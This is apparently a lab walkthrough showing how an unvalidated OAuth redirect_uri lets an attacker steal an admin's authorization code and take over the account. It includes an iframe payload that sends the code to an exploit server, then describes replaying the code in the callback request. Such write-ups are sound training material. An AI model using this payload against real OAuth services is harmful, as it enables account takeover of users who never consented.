OAuth account hijacking via redirect_uri
Date: 04, August, 2021
Author: Dhilip Sanjay S
Task
This lab uses an OAuth service to allow users to log in with their social media account.
A misconfiguration by the OAuth provider makes it possible for an attacker to steal authorization codes associated with other users' accounts.
To solve the lab, steal an authorization code associated with the admin user, then use it to access their account and delete Carlos.
The admin user will open anything you send from the exploit server and they always have an active session with the OAuth service.
You can log in with your own social media account using the following credentials:
wiener:peter.
Solution
Understand the OAuth flow.
There is no validation on the
redirect_uri.Create an iframe with the
redirect_uripointing to exploit server in the exploit server:
<iframe src="https://oauth-ac881f9f1e04b5c5809b00fb02020011.web-security-academy.net/auth?client_id=xop1ssyd5egkugmiuspd1&redirect_uri=https://exploit-acb41f7a1efbb5c380fe001001e600fe.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email">Open the Access log after delivering the exploit to victim.
You must have received the
/outh-callbackwith the authorization code:
Copy the code.
Intercept the
/outh-callbackrequest and replace the code.Now you'll get access to admin panel:
Delete the
carlosuser to finish the lab!!
Last updated